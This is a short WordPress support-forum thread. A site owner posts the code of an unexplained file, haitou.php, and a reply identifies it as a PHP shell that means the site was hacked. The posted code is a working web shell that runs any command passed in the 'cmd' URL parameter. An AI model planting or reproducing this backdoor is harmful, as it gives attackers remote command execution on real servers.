WordPress.org

Ready to get started?Download WordPress

Forums

Why is haitou.php on my website? (2 posts)

  1. derekgilbert
    Member
    Posted 6 years ago #

    A file called "haitou.php" showed up on my site on 2/11/08. Here is the code:

    <?php
    $cmd=$_GET['cmd'];
    if (isset($cmd)) {
    echo system($cmd);
    } else {
    if(ini_get('safe_mode')){
    echo "allyourbasebelongstous_";
    } else {
    echo "allyourbasebelongstous";
    }
    }
    ?>

    A Google search reveals several thousand sites populated with this file, nearly all of them modified between Feb. 10 and 12, 2008.

    Why? How did it get there? Does this do anything but generate "allyourbasebelongstous"?

  2. whooami
    Member
    Posted 6 years ago #

    thats a PHP root shell script, youve been hacked.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags